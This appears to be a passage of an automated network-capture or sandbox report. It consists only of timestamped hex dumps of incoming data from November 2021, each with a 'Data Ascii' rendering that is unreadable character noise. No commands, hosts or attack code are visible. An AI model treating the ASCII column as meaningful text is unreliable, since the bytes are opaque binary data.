                                                                                                  2021-11-24 13:17:14 UTC393INData Raw: 00 a3 8b 4e bc b3 96 e2 67 28 6c 83 5d a4 71 2b ce 26 32 92 b5 4e bd df 39 0e 0a d7 a2 2a e9 79 ab 8c 34 09 fa 49 7c 37 0c 02 d6 7e 16 6f da b8 a4 bb d6 e3 c0 b1 99 5e 2e 97 f6 97 06 f3 64 18 3a 73 07 0a ba 5d 6f be 78 77 6c 0d fa c1 b7 34 98 73 c7 f5 58 d5 cf 83 94 68 4c 46 07 32 0c e1 9e 6f 4f 4f 47 19 1d e1 be a9 a7 20 df 8f ab 97 65 8f 8a 35 3a 9f 55 ef bc 44 13 6e ea 09 ce 0b 74 85 df 35 dc c3 47 be 61 18 d6 10 67 e0 a5 22 c5 cc a1 f1 c7 37 5b 30 e6 d1 72 78 1b df 3e d8 66 05 9b 6a 04 74 c2 48 d0 3e b8 db 82 f8 cd 39 ab 33 df e3 b2 a7 ae 65 8b 97 43 bf 64 8b f0 97 29 36 53 a7 95 67 8d 0e 37 26 e3 60 0a 70 ba 85 fa 52 06 0a c9 e8 f3 07 28 5d 54 3e 1b 61 0f 83 0b da 84 00 0a 48 ae 68 f2 e1 73 83 fc 37 39 e9 88 43 0b ba 62 e4 af b7 b0 c9 41 9f dd 8c 80
                                                                                                  Data Ascii: Ng(l]q+&2N9*y4I|7~o^.d:s]oxwl4sXhLF2oOOG e5:UDnt5Gag"7[0rx>fjtH>93eCd)6Sg7&`pR(]T>aHhs79CbA
                                                                                                  2021-11-24 13:17:14 UTC395INData Raw: 6a c6 83 a6 25 42 f3 64 5d 22 b3 08 0b 7b 78 26 6d 5f bb 47 65 1a 4d d4 36 f0 fa f4 51 95 c1 52 eb a9 5c 1a a3 fa 10 e2 10 81 6a ae db b9 c9 d7 88 e4 eb 7f f2 40 fc 65 0c 55 eb 27 0d ea df c6 ec ee a5 ee d4 9d c0 d7 43 f9 21 42 8c f6 6c df 92 6f 0a 8c d3 89 db ad 07 f4 2a 43 6a c1 28 f5 b1 7e a7 7d 75 e8 ec 5e 50 61 74 b3 71 77 86 7b 4c 04 ae da 4d 39 95 14 6c 0e 88 6e b5 57 d7 34 7f 59 8a 99 2b 2e b0 68 f6 ea 06 a2 01 85 ef 4a 07 f0 24 c5 59 f4 e1 49 c9 11 dd 05 9f 1c 07 be 9d ab 68 46 0e 4a c0 4d 32 7c 78 c0 64 f4 8a 2e 39 98 26 0d e7 d4 1e 18 52 d1 f2 d4 1d bc a9 d7 39 79 9c b7 8f 40 da 0d 16 d1 3f 81 5f cd 4d 13 59 c3 f3 83 72 f0 c6 ea 3d 51 dd 6f 13 c2 f2 21 2f 47 ca e8 27 e4 8d c0 a8 bb 37 2f b6 44 4d be 10 70 fa 36 c4 82 17 96 6d 3c 17 fb 58 47 7b
                                                                                                  Data Ascii: j%Bd]"{x&m_GeM6QR\j@eU'C!Blo*Cj(~}u^Patqw{LM9lnW4Y+.hJ$YIhFJM2|xd.9&R9y@?_MYr=Qo!/G'7/DMp6m<XG{
                                                                                                  2021-11-24 13:17:14 UTC396INData Raw: 90 4e 4f 63 e6 1c e1 aa 56 a6 20 f3 70 aa 97 29 70 8b 35 1c 9f 55 ef bc 44 16 6e ea 09 ce 0b 00 7a de 35 b0 3c 46 be 71 e7 d5 10 97 1e a7 22 29 32 a4 f0 c7 37 5b 30 e6 d1 72 78 f2 36 d7 31 aa c9 57 a6 c8 b8 0e 84 1c f2 74 17 1c 66 53 a7 d7 6c df e3 4d 58 51 9a 74 68 bc 40 a0 d4 f0 97 29 26 53 a7 95 67 8d 0e 37 26 e3 60 0a 70 ba 85 fa 52 06 0a c9 e8 f3 07 fa 02 54 3e 86 63 0f 03 5d d8 84 80 7d 4a ae e8 16 be 73 83 f3 35 39 69 70 1c 0b ba 68 84 af b7 90 a9 41 9f e1 ec 80 ab 9d a3 d6 db 79 e7 1c 14 80 1a 8d 33 68 99 42 df b7 72 f1 df 2d b3 34 89 61 b3 ce 88 69 58 e3 8b d1 8a 19 a2 63 34 8e b2 cd 10 5f fe d3 29 71 db 1c 95 da a9 aa d9 3b 24 9c eb 7d a5 ba 35 ca 2b 96 64 fc 5f de 5e 46 1c 62 ab 57 c2 a0 59 57 04 72 32 17 fa 0a f1 d6 51 af f6 03 14 8a b5 45 19
                                                                                                  Data Ascii: NOcV p)p5UDnz5<Fq")27[0rx61WtfSlMXQth@)&Sg7&`pRT>c]}Js59iphAy3hBr-4aiXc4_)q;$}5+d_^FbWYWr2QE
                                                                                                  2021-11-24 13:17:14 UTC397INData Raw: 7e a7 7d 75 e8 ec 5e 50 61 74 b3 71 77 86 7b 4c 04 ae da 4d 39 95 14 6c 0e 88 6e b5 57 d7 34 7f 59 8a 99 2b 2e b0 68 f6 ea 06 a2 01 85 ef 4a 07 f0 24 c5 59 f4 e1 49 c9 11 dd 05 9f 1c 07 be 9d ab 68 46 0e 4a c0 4d 32 7c 78 c0 64 f4 8a 2e 39 98 26 0d e7 d4 1e 18 52 d1 f2 d4 1d bc a9 d7 39 79 9c b7 8f 40 da 0d 16 d1 3f 81 5f cd 4d 13 59 c3 f3 83 72 f0 c6 ea 3d 51 dd 6f 13 c2 f2 21 2f 47 ca e8 27 e4 8d c0 a8 bb 37 2f b6 44 4d be 10 70 fa 36 c4 82 17 96 6d 3c 17 fb 58 47 7b 8e 23 67 9a 65 af 77 ea 61 eb 27 dc 05 39 63 56 6c b3 48 84 a2 54 da 2a 2c 53 7d 07 2e 9b 41 b0 3f b3 6d af de 3f 86 d2 60 18 07 5a 96 53 01 e6 b0 7a 6f 1d 68 11 a2 26 be 15 c1 fa d8 93 ce 9a 42 47 e1 02 04 1c 16 c5 93 5b d4 53 ee 78 b0 08 b8 1b d1 90 02 15 a3 a1 67 0f 03 a4 31 69 bb f3 38
                                                                                                  Data Ascii: ~}u^Patqw{LM9lnW4Y+.hJ$YIhFJM2|xd.9&R9y@?_MYr=Qo!/G'7/DMp6m<XG{#gewa'9cVlHT*,S}.A?m?`ZSzoh&BG[Sxg1i8
                                                                                                  2021-11-24 13:17:14 UTC398INData Raw: 89 23 e3 81 6e c6 83 a6 25 42 f2 64 5b 22 b3 08 3b 7a 78 26 6d 5f bb 47 65 1a 4d d4 32 f0 fa f4 51 95 c0 52 eb a9 5c 1a e3 fb 10 e2 10 81 6a ae db b9 c9 d7 8c e4 eb 7f f2 40 fd 65 05 51 eb 27 5d eb df c6 8c 6f a5 ee 7c 95 c0 d7 a7 fd 21 42 8c f6 6c df 9a e5 0a 8c bb 8c db ad e3 f0 2a 43 6a c1 28 f5 c1 f1 a7 7d 8b c8 ee 5e b4 65 74 b3 71 77 86 7b 3c b4 ac da 6f 39 95 14 88 0a 88 6e b5 57 d7 34 eb e9 88 99 ef 2c b0 68 12 ee 06 a2 01 85 ef 4a 2f f0 24 c5 79 f4 e1 49 89 11 dd 05 9e 1c 0f be 9d ab 68 46 8e 4e c0 4d 32 7c 78 c0 64 f4 8a 2e 39 98 26 0d e7 d4 1e 18 52 d1 f2 d4 05 a4 b1 d7 21 65 84 b7 ae 64 fb 0d 3f f9 16 81 6e f9 7c 13 1b 82 b1 83 30 b5 84 ea 77 1c 97 6f 41 97 a0 21 75 1a 90 e8 44 81 ee c0 c3 d2 5c 2f c5 35 3e be 6b 09 81 36 40 00 93 96 e1 b2 9b
                                                                                                  Data Ascii: #n%Bd[";zx&m_GeM2QR\j@eQ']o|!Bl*Cj(}^etqw{<o9nW4,hJ/$yIhFNM2|xd.9&R!ed?n|0woA!uD\/5>k6@
                                                                                                  2021-11-24 13:17:14 UTC399INData Raw: 32 0c e1 fe 90 4e 4f 63 e6 1c ea a4 4a b8 3e ed 6e b4 89 37 6e 95 2b 02 81 4b f1 a7 4b 1d 6e ea 09 ce 0b 00 7a de 35 b0 3c 4f a9 6f f9 cb 0e 89 00 b9 3c 37 2c ba ee d9 29 45 2e f8 cf 65 71 f2 36 d7 31 aa c9 57 a6 c8 b1 1a 98 0a ea 6a 09 02 78 4d bc c1 7b c7 f8 53 46 4f 84 6a 76 a2 55 a9 d4 f0 97 29 26 53 a7 9e 70 93 10 20 2e fa 7e 14 6e a4 9e f7 5a 0c 0d dd f6 ed 19 e4 1c 4a 20 91 68 0f 03 5d d8 84 93 72 54 b0 f6 08 b0 64 9d ed 2b 27 77 6d 0d 06 ac 63 90 b1 a9 8e b7 5f 81 ff e3 93 ab 9d a3 d6 d3 62 f9 02 08 8f 11 9c 2d 76 87 5c c1 a9 6c e3 ca 37 b8 2c 97 7f ad d0 96 77 44 eb 8b d1 8a 0b b1 7d 2a 96 be ca 04 56 e5 cd 37 6f c5 02 8b c7 a7 b2 cd 30 38 82 f5 63 b8 a4 2b d9 39 96 64 f6 41 c0 42 48 08 7c b7 5c d1 be 47 49 1a 6c 2c 09 ec 0d e8 d9 5b b4 e8 17 0e
                                                                                                  Data Ascii: 2NOcJ>n7n+KKnz5<Oo<7,)E.eq61WjxM{SFOjvU)&Sp .~nZJ h]rTd+'wmc_b-v\l7,wD}*V7o08c+9dABH|\GIl,[
                                                                                                  2021-11-24 13:17:14 UTC400INData Raw: 96 0d 0a b1 2b a7 82 75 a1 ec 82 50 5c 74 0a 71 46 86 ed 4c 21 ae a9 4d 20 95 44 6c fe 5c 91 b5 b5 66 cb 7f 8d 04 66 2b e8 db 97 f6 52 4e 5d 01 2f ca b5 07 5a 24 3a 59 66 e1 95 c9 6b dd bc 9f 7e 07 28 9d e1 68 35 0e 78 c0 1d 32 83 ac 3f 64 0b 3b d1 39 67 a8 f2 e7 2b 75 e7 52 2e ba 2b 1d 43 8c 28 39 87 9c 49 8f 9c da d1 16 68 3f 38 5f 5b 4d 85 59 b0 f3 f0 72 a0 c6 ba 3d ae 09 9f 13 3d 43 c3 2f b8 44 3c 27 1b e6 06 a8 44 7f 97 b6 bb 68 14 10 8f fa 9c c4 5e 17 04 6d 85 17 81 58 d1 7b ec 23 14 9a 2f af 27 ea 53 eb d8 08 e6 39 9c e7 ab b3 b7 0a 09 54 25 41 a3 53 82 4f 5d 9b be 95 68 b3 92 af 8b 3f 5a d2 29 18 be 5a ab 53 97 e6 81 7a 1c 1d 4d 11 f2 26 a7 15 3e 2e 0c 93 31 2b f3 47 1e 8c 8a 1c e9 ae f8 5b 2b 1b a6 78 4f 2d 9d 1b 2f 90 02 15 7f a1 67 0f ba a4 31
                                                                                                  Data Ascii: +uP\tqFL!M Dl\ff+RN]/Z$:Yfk~(h5x2?d;9g+uR.+C(9Ih?8_[MYr==C/D<'Dh^mX{#/'S9T%ASO]h?Z)ZSzM&>.1+G[+xO-/g1
                                                                                                  2021-11-24 13:17:14 UTC402INData Raw: c8 a8 1f 00 fe 96 01 56 03 3b 73 cf b5 53 4f a3 ff a3 b2 67 45 1b aa 5e da c5 c2 bb d8 fe c8 52 43 39 78 97 ba b8 4b 5b e3 d8 da 8c b2 b3 3e 0f 6e 5b d0 ff 47 8e 21 8a ef 8b e3 9b 6c 85 04 bf b0 82 6c 93 b8 e3 6e 98 25 0d b7 00 c4 63 20 3f 24 c5 8c 21 df 9b 10 87 7f 12 e2 01 d1 30 2f e7 bb 4c f8 f3 28 8f 29 65 ee ee 81 2b 06 bb e5 0c 0e eb 57 26 e4 9c e3 64 6c 94 5e 1f d9 bc 81 74 f9 70 c5 59 53 7c 2d 35 7a b0 13 9a d5 f1 4d 1f 2f a2 5e 87 5e 9f 5b 00 9c 09 3a 9b 1f 06 cd 41 00 ab 9e fd 2b ad 88 73 91 5a 2a 1d 00 ba 85 6c 0e 39 b9 95 27 17 df 03 bb 22 87 79 de c6 e9 b3 db 5f 22 ce 60 b9 1b b3 6a 93 47 52 3c 33 2d 60 16 b7 6e dc 44 6e 38 b8 ee e0 3d 7d 10 88 2d ac ee 6d d6 2c 17 29 f0 81 88 b0 7b 67 bb e6 39 a6 e0 86 66 f3 83 30 cb b7 4a ab d7 46 4e f3 a7
                                                                                                  Data Ascii: V;sSOgE^RC9xK[>n[G!lln%c ?$!0/L()e+W&dl^tpYS|-5zM/^^[:A+sZ*l9'"y_"`jGR<3-`nDn8=}-m,){g9f0JFN
                                                                                                  2021-11-24 13:17:14 UTC403INData Raw: a8 f3 76 6d ca a4 2b 63 61 1e 5a e3 7e ff 63 89 0d 60 6a bc c2 ae 1f c1 a0 d2 3e 1e d0 7d d5 2f bd 87 06 71 5b b8 68 96 db b0 aa 8d 8c 1c ff 77 2c 82 fb a2 5a 34 77 d9 26 bb 26 0a 38 c3 f4 09 67 9a 81 2a d5 b5 a5 a4 ab ed 5d 9d 74 3b 7f 56 96 5b 6a 6e 85 7a 01 78 2d 6e 91 22 da e3 d7 90 1a e4 98 72 17 40 02 ac 76 56 99 d4 1f a4 9d c5 b6 ac b1 1b 59 a3 bb 73 61 22 b6 59 3c 9c a0 82 4a 62 2a 22 4a b6 6d b9 f0 8f 88 ed 36 88 ce 6b 5f 86 6c 05 c0 31 a3 91 79 de 06 31 b7 d5 de 80 fe d5 f1 48 ef 17 c2 73 d8 4d 38 c2 e4 30 46 c6 7f 2d 23 45 dc f3 d7 c7 7b 85 82 0d 70 1f 69 d1 f1 b5 e1 3d d4 95 e0 a7 8c 27 9f 42 97 26 dd 91 fa 16 3e b4 e8 7c 7d 7e e9 90 32 68 59 1f f5 4b 53 78 af fb 0e f1 e4 f6 79 ee a3 44 57 47 3d a3 a8 22 0c 56 0a 47 30 07 35 6b ee 77 17 45 35
                                                                                                  Data Ascii: vm+caZ~c`j>}/q[hw,Z4w&&8g*]t;V[jnzx-n"r@vVYsa"Y<Jb*"Jm6k_l1y1HsM80F-#E{pi='B&>|}~2hYKSxyDWG="VG05kwE5
                                                                                                  2021-11-24 13:17:14 UTC404INData Raw: d3 f5 f3 00 82 3e 5f a6 68 d3 47 2a a5 b2 65 44 65 24 49 f1 1d 48 9d 3a 21 c1 56 4c b6 fe 7a 4d 7e ea d8 c8 ea ea 1b 64 5d 4a f8 19 df e3 22 0c 71 5e 99 27 b4 fe ef dd 6e 43 a0 6f aa 96 0c 87 1a e3 b7 20 a9 a4 29 0a ec 50 5c bf d2 ca 47 b8 69 67 eb 0b d8 45 7a 6c 24 ff 46 e0 b3 5a 4c af 32 31 67 2a dd 6d 56 20 ed 1b 2c 97 73 16 44 39 a5 f0 81 3c 38 23 e3 47 e6 3d d5 69 59 6b fb e6 c2 0e 2c 2f a0 bb cd 5d 41 3f 96 b2 bc 62 b0 0c c0 9a 50 f0 62 12 3f c6 81 7f 35 2b 12 89 20 ce 85 bb 10 28 07 40 e0 50 dc 29 95 2d df 4e d4 be cf 04 97 b5 5f f0 fb 94 dc 3b a0 34 4d 53 24 91 80 c7 35 7f 35 c7 97 cb 6a 23 45 68 73 fd b2 54 1b df 8c f4 b7 aa 19 2f e7 cb 52 ef 7c 89 3f 84 66 bb fa ae da f9 c8 3f 2f ac ce 6a a4 3e af 1f 94 8a 7b 9e a9 ea 1a d8 52 dd ca 69 46 fe 7a
                                                                                                  Data Ascii: >_hG*eDe$IH:!VLzM~d]J"q^'nCo )P\GigEzl$FZL21g*mV ,sD9<8#G=iYk,/]A?bPb?5+ (@P)-N_;4MS$55j#EhsT/R|?f?/j>{RiFz
                                                                                                  2021-11-24 13:17:14 UTC405INData Raw: 7b 10 5c 17 86 5a cc f1 c3 49 7c 39 ce 7a df a2 b1 aa 27 77 4b 25 68 c5 88 25 1c ae 9c 09 e7 a8 72 1f b2 55 30 b3 44 86 b2 96 87 8b c9 2a f9 44 7c 4a a7 b2 90 47 88 71 37 df 28 d3 6d 3b fd a7 9c 0b 3b 9e c4 56 56 a2 5a a1 ea de 52 a4 ad 0d 25 f6 f3 b3 1d 46 e2 60 26 ca 23 45 43 b9 04 c4 da 09 cf f5 3e e6 3b 65 6f d8 ec 2b de be ea cf fb dd 52 af 8e a7 44 62 f0 4b 7c c5 4e 6c d3 27 ac 0a f7 28 9b 07 a7 ef 0a ab f6 cf 99 af c5 64 24 4b 1f 0f a2 46 2c 4a 53 03 cc 26 5f 29 c5 8a ec df 9a 6c 70 93 45 03 63 aa 78 3a 4d 1f f6 75 7d 34 53 56 dc d9 9d 31 23 4e ea 9b 18 42 a9 fd 48 d6 37 45 3d b9 90 4d b8 11 89 c8 12 62 a6 ae 0c f9 e6 6e 5b e1 06 80 f0 02 f1 8c 60 b8 7a d8 52 9f 7e 55 c6 fc c8 ef 13 58 8a 37 93 41 1f 84 60 fc 20 fe 8d 4f 8f fa ba 56 d7 7d bf 36 4f
                                                                                                  Data Ascii: {\ZI|9z'wK%h%rU0D*D|JGq7(m;;VVZR%F`&#EC>;eo+RDbK|Nl'(d$KF,JS&_)lpEcx:Mu}4SV1#NBH7E=Mbn[`zR~UX7A` OV}6O
                                                                                                  2021-11-24 13:17:14 UTC407INData Raw: 2c 87 46 d1 9a 99 63 35 56 5c d0 74 62 c2 02 a3 76 3d 7a 5d a6 cf 9b d2 7f 24 62 5c 7c f0 6e 0f bf 0e 6f 2c 35 88 e9 bb 24 63 0d aa 4c b5 b0 cc e8 b0 f5 29 d2 98 49 a5 bb 10 35 b9 e8 53 56 c2 93 4f 47 23 45 f0 aa c1 63 e1 a9 1b 48 2b 1b a0 6e d3 ae 66 b6 b7 29 a9 44 44 61 69 0e 92 41 2a 7a 40 b6 af 73 f9 74 2c 93 ed de 07 bf c2 09 c9 ee dd 65 26 e4 60 53 a0 b9 10 4d 65 ef 5a 12 fd fe a2 9f d6 ac dd f4 41 e5 fe 56 a9 64 42 6c 3c b9 21 65 c3 7e f1 98 f9 2f f0 9e b3 33 69 0d 29 e0 5c d7 45 68 3d d4 e0 c8 e0 e2 02 99 68 65 33 d0 04 3e 85 30 7b 28 9f c2 1c 5b 39 6c 44 7a dc 34 7e de b9 c4 fe c5 b9 7a 63 5e 36 8f b1 3c 8a 1e 5d 04 2c 29 a7 d7 16 60 98 45 29 12 3a 21 28 cf 9b 82 31 b3 dc b9 2b a5 9b d1 3d 5b 06 8c ad c9 d2 2d 8a 97 22 35 57 c1 2d 07 ab 9b 00 ed
                                                                                                  Data Ascii: ,Fc5V\tbv=z]$b\|no,5$cL)I5SVOG#EcH+nf)DDaiA*z@st,e&`SMeZAVdBl<!e~/3i)\Eh=he3>0{([9lDz4~zc^6<],)`E):!(1+=[-"5W-
                                                                                                  2021-11-24 13:17:14 UTC408INData Raw: 98 b3 c0 17 bb 26 6b 84 f3 fc 70 8e 21 80 a7 1a 47 4f 3c 4a 19 fa f7 fc e9 3b 07 51 99 76 01 93 92 b8 03 68 cf d2 94 4b 23 6a 24 5e a0 ab 96 57 45 b7 43 40 1a 36 5e 04 a7 43 3a e0 91 c5 e4 c0 a5 33 84 27 eb a2 57 5a ae 4c d0 b1 7f 72 18 11 2a f5 10 54 20 48 0d 65 7d c3 9b 50 8a 7a 70 47 2a bf 1f 7b 87 8d 31 c8 ce 96 8b 45 c1 ee 9d ba e5 0f 24 cd c9 05 e0 cc 72 89 1d e5 95 80 f4 29 b2 ef ea 7e d4 9f 0d 06 5d 79 8a 9e 9a fd 75 84 40 63 10 94 e8 e2 81 7f 34 3c 18 c2 cd 4c 03 c0 a2 96 7d 36 49 51 7e ce 50 b7 dd 5c c2 78 7a ab c8 a4 25 4b 1e 88 89 66 ce 09 48 10 f2 60 4e 1f ce b2 30 b5 77 32 f5 ee de d2 f9 5b ce 23 cc e3 48 d6 81 98 f0 08 5b de 8e 7c eb 8e a7 dd ad 0f b0 04 50 39 42 b0 20 a7 e0 b2 c2 67 7c d2 ef b4 4f 22 c7 82 a5 e2 45 b9 5a 2e a7 25 fd 02 30
                                                                                                  Data Ascii: &kp!GO<J;QvhK#j$^WEC@6^C:3'WZLr*T He}PzpG*{1E$r)~]yu@c4<L}6IQ~P\xz%KfH`N0w2[#H[|P9B g|O"EZ.%0
                                                                                                  2021-11-24 13:17:14 UTC409INData Raw: 6f 16 01 ab ff 48 ec 28 ac 94 b3 86 d7 c2 a2 c0 bc bf a3 92 be e2 8c 35 e8 db 63 be 66 9e 98 c8 4a f8 6b 12 bf ab d6 34 b8 52 4d 7c eb 1f fe f9 b3 84 7f 1f 21 83 9e 84 4e ea be 76 1c d0 c7 1b 20 67 1b 5e 6d 78 96 b7 4d 9e 43 78 43 34 23 1b bc 8d e2 fa ae ff 54 6d 80 b3 30 90 3b 9f 9c 13 14 ab bb 2f bb 2a 0d f4 16 21 6f f8 df 48 95 a2 91 c3 11 19 0b a1 44 0d dc 2e c5 27 f7 8c 5f 9e e0 72 6e ea dc fd 1e 19 ac fd 40 20 06 f1 d0 9a 44 4e d9 57 ec 71 b7 b8 81 75 4a 0b 01 82 7b 6d bb 37 b3 a3 24 f5 cb ff 73 e0 65 5c 7f e4 64 4d ce d3 b6 63 6a c6 0b 69 ee f4 1f e3 c2 79 08 4f 35 91 7f 7a 02 af c8 01 88 2e d0 1e fd 57 08 ae bf ad 6c 37 89 66 3d 12 de b4 2c 8d 2b d8 ff 1a cc 86 c3 43 17 74 2b 1b 26 bb 0a 4c 59 5b 20 c8 42 76 d4 4a e3 95 e4 16 69 55 24 44 4a 35 0d
                                                                                                  Data Ascii: oH(5cfJk4RM|!Nv g^mxMCxC4#Tm0;/*!oHD.'_rn@ DNWquJ{m7$se\dMcjiyO5z.Wl7f=,+Ct+&LY[ BvJiU$DJ5
                                                                                                  2021-11-24 13:17:14 UTC411INData Raw: c1 2c 22 ec 00 a1 91 0d 8f 88 33 26 71 c8 19 80 62 23 70 f2 29 9c 8a 4a fc 14 b5 d7 47 c6 d5 41 f3 4f 65 ab b0 ad 7b 90 41 39 8a 7b 69 ab 7e 67 67 20 e7 49 bf c3 8e 6b c8 2c b7 b3 60 c0 4f 92 c5 ab 28 7b e7 7a 4d 81 98 4c 31 0b 5d e1 e3 e5 e6 04 4d 62 5a 86 2a 6e c1 66 17 4e dd ae c8 bf 7e 15 ed a4 7d fc 80 37 42 3c 4b 52 0f be c1 39 f4 2f 9b dd b3 d0 00 6e a6 3f e3 3c 4a ff 10 90 14 41 69 30 0e 68 77 bf a1 f5 1f ed 8b 26 3d fe da a5 5c 10 c3 0f 9b b5 04 dc 0c 0d 17 e5 28 39 4f 3f 23 bd 3a 5d fa 19 7a 53 e8 88 de f9 2c d5 c9 f6 f3 2a 12 c8 5b 1a df 8f 6f 29 3f fe 92 de 24 b8 89 ff 55 e2 ea 9a 35 c4 e2 4c a2 3e 13 90 cd 8a 11 a2 77 3c a7 74 c5 6a f9 3d 9f e4 be 7e 35 ee da 34 58 42 7d b9 fa a7 9a 3c 1a ba 78 28 0f 93 fa cb c7 d8 f3 f6 79 aa 0d 48 94 ba e1
                                                                                                  Data Ascii: ,"3&qb#p)JGAOe{A9{i~gg Ik,`O({zML1]MbZ*nfN~}7B<KR9/n?<JAi0hw&=\(9O?#:]zS,*[o)?$U5L>w<tj=~54XB}<x(yH
                                                                                                  2021-11-24 13:17:14 UTC412INData Raw: 4f 55 1b 5f 97 36 d4 da e3 94 39 46 e3 85 e9 b3 b7 4b b1 7c cf a0 aa 84 27 01 e1 2b b6 f9 d6 ea a7 45 84 bd f4 2f 7e d0 68 a4 fc 92 be 67 2b bd 33 ad 49 99 05 85 50 36 1b d1 f8 4c d6 93 b6 d4 af 01 4d cb e0 a5 26 27 20 bb 4c 02 c0 01 51 83 36 ed f8 e5 1a b8 68 f8 2a 42 86 64 d2 cf 69 70 b9 da ea c1 c4 24 5c 9f af 1e 6a 77 31 1d 8b 3c 9e 78 49 86 fd 79 72 96 a0 fe 53 3e 08 80 8a 6d 17 02 52 6f 48 9e c9 84 eb 38 6d 80 e8 77 76 83 ff f1 40 a9 8a d5 37 a7 f8 97 7d f3 e9 4f 4e 65 ae c5 f8 d0 e5 c5 d6 f3 6c c5 7e 58 6d 02 5e eb 10 50 10 89 82 10 6d b3 43 22 8b 47 c3 69 97 9f 9e 48 27 07 cb 4f 8b 67 8b 42 f2 c2 fc d3 f7 4c 0b 3c b2 23 c9 78 3d cb e2 76 9a 52 a0 c1 8b 47 80 87 f0 ce 27 23 b2 c6 47 4e e4 f2 09 98 d5 b3 d7 fe 56 7d d3 ca a5 cf 20 a4 f3 3d b0 45 52
                                                                                                  Data Ascii: OU_69FK|'+E/~hg+3IP6LM&' LQ6h*Bdip$\jw1<xIyrS>mRoH8mwv@7}ONel~Xm^PmC"GiH'OgBL<#x=vRG'#GNV} =ER
                                                                                                  2021-11-24 13:17:14 UTC413INData Raw: 32 38 84 66 84 62 33 f7 be 8f e5 d8 87 ac aa 8d 58 e7 12 07 3c b3 f5 6b 3b bd 49 6f c2 64 b3 51 8b 24 d9 b4 5a 09 98 5b d7 2c 08 ef a9 6d cf 5c c0 26 92 50 7c dc e0 26 00 2e 6b 05 04 d6 c4 86 46 9f b6 83 d6 8b 91 86 57 3e f9 41 e4 66 1f ba d6 65 16 9b 80 04 56 46 86 92 16 30 92 01 97 ed 8e 16 f9 45 9b b5 60 a0 d2 12 41 5f 82 cd bd 14 24 e1 b5 af 8f dc 09 6a 27 2e 13 37 f7 db 1e 77 27 fd f1 cc e6 a7 50 08 7a 9b 5c 90 c4 4c 7d e3 ef a3 50 eb 10 47 37 e9 08 88 32 a0 d4 15 c1 c1 9d c2 59 37 0f 64 8a 8d a8 a7 11 b4 e3 37 f8 4e dc b3 b6 e1 37 4d 63 97 1d 5a 5f 1a 22 09 4d d2 26 f8 ee 6d 14 ff 53 a5 4f eb 01 c0 4d d0 9a 2b a6 33 8f 6c c5 75 b5 fc 10 18 8e 13 28 dd 7f 41 93 d0 c4 fc 18 f9 fc ed c3 2d 0b f0 85 86 f7 8b 9e 4e 5b ca 38 1d 4b d3 61 9c dd 92 09 93 3c
                                                                                                  Data Ascii: 28fb3X<k;IodQ$Z[,m\&P|&.kFW>AfeVF0E`A_$j'.7w'Pz\L}PG72Y7d7N7McZ_"M&mSOM+3lu(A-N[8Ka<
                                                                                                  2021-11-24 13:17:14 UTC414INData Raw: fc 10 78 98 5a 1c 23 ff 18 6a 07 4d de cd 8c 26 20 95 bd c0 33 e8 3e b2 78 a0 45 9b bc 45 12 e2 2a 1e a4 62 66 cf 84 77 0b fe 10 68 16 a5 9e ae 4c 60 7d a4 fa 97 e5 5e 1b f5 8e 69 4c 29 97 45 1a d7 ac 60 f0 b5 ad ee a6 2c 94 66 da 16 be 8f 6c bc 18 2c a3 05 0e e7 ec ac 2c 47 33 0e 7b 4b 28 3b 57 74 43 cb 1c 42 d9 fc ad b1 c6 c8 4a 1c fa bb 31 47 d1 9a ee dc 33 d5 05 9e 20 ab 96 3d 31 4e 07 15 aa b7 d0 3f f8 ce 4e 9c cd a0 a6 b0 d9 d7 e8 77 e8 a6 f1 af 32 39 d5 45 3f ad e8 31 fe 90 33 cd 95 67 2e 9d 92 e2 fa 05 cb d4 89 14 4c 19 1c 03 2d a5 c7 2b f8 5b 64 28 fc cf 23 3a 4d fe a0 48 c9 37 cb 93 31 52 6d c4 68 6c a7 70 38 4d 7e 00 bd a1 e1 cb cf ed 73 b7 5e 5a 38 60 ed 22 6d cf 36 dd 6e e6 b5 3e dc 89 69 c3 01 2a 51 ca f4 30 1a e0 cf 10 4a eb b3 e2 5b d6 67
                                                                                                  Data Ascii: xZ#jM& 3>xEE*bfwhL`}^iL)E`,fl,,G3{K(;WtCBJ1G3 =1N?Nw29E?13g.L-+[d(#:MH71Rmhlp8M~s^Z8`"m6n>i*Q0J[g
                                                                                                  2021-11-24 13:17:14 UTC415INData Raw: 97 c7 03 6e 69 a1 be da ed 3f d9 27 6b 16 89 a1 03 8e 1e 46 c7 6e ab be 95 95 9a 80 8e f5 a6 01 ae f1 a9 db 67 38 fe 78 da 44 bb ef 4a d2 72 a5 70 d6 04 42 0e 0c e5 31 74 3d 3c bb 86 03 0f 01 19 52 8e f5 8a 10 99 5c b0 a1 8f 45 68 7f 46 c7 07 24 66 31 eb 9c 4f 62 fe 07 a8 f5 5c 6a af 2f 83 50 74 4f 56 26 ba e6 f6 4b 63 f6 d4 2d 53 ac 63 3f 37 f2 46 2a 6b b4 fa 22 d2 91 a6 a5 f3 ca 5c ae f4 46 e9 11 19 fa 73 d2 ed d7 de 64 41 15 d7 7b 58 4d 8d 0f 1c 84 1f 96 ac ac 25 e3 20 cc 49 d9 d1 57 1e ba 06 b2 c4 56 a3 1f 59 57 09 34 5e 97 47 b5 13 f1 6e bd fb 25 55 80 99 6f e6 03 3f 9b 8d fb 64 58 76 24 b7 48 ad 14 e8 7f d7 b5 9c a4 8b a6 4f 37 bc 00 45 ed 6b 20 7e 87 82 62 cc 40 79 b7 81 52 cd 51 3f 25 ab 9b cc 0c 3c 92 d6 16 0e c7 64 1e 54 2d d4 d2 2f 02 68 d5 fa
                                                                                                  Data Ascii: ni?'kFng8xDJrpB1t=<R\EhF$f1Ob\j/PtOV&Kc-Sc?7F*k"\FsdA{XM% IWVYW4^Gn%Uo?dXv$HO7Ek ~b@yRQ?%<dT-/h
